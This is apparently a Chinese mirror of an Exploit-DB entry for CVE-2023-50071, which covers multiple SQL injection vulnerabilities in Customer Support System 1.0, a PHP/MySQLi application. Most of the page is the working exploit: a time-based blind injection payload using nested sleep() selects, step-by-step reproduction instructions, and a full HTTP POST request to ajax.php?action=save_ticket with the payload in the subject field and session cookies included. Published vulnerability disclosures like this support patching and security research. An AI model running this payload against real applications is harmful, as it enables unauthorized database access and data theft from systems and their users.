CVE-2023-50071 – Multiple SQL Injection

• Exploit Database
• 121 阅读

• 作者： Geraldo Alcantara
  日期： 2024-03-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51862/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70

  # Exploit Title: Customer Support System 1.0 - Multiple SQL injection vulnerabilities # Date: 15/12/2023 # Exploit Author: Geraldo Alcantara # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows # CVE : CVE-2023-50071 *Description*: Multiple SQL injection vulnerabilities in /customer_support/ajax.php?action=save_ticket in Customer Support System 1.0 allow authenticated attackers to execute arbitrary SQL commands via department_id, customer_id and subject.*Payload*: &apos;+(select*from(select(sleep(20)))a)+&apos; *Steps to reproduce*:   1- Log in to the application.   2- Navigate to the page /customer_support/index.php?page=new_ticket.   3- Create a new ticket and insert a malicious payload into one of the following parameters: department_id, customer_id, or subject. *Request:* POST /customer_support/ajax.php?action=save_ticket HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: */* Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------81419250823331111993422505835 Content-Length: 853 Origin: http://192.168.68.148 Connection: close Referer: http://192.168.68.148/customer_support/index.php?page=new_ticket Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=mfd30tu0h0s43s7kdjb74fcu0l   -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="id"     -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="subject"   teste&apos;+(select*from(select(sleep(5)))a)+&apos; -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="customer_id"   3 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="department_id"   4 -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="description"   <p>Blahs<br></p> -----------------------------81419250823331111993422505835 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream     -----------------------------81419250823331111993422505835--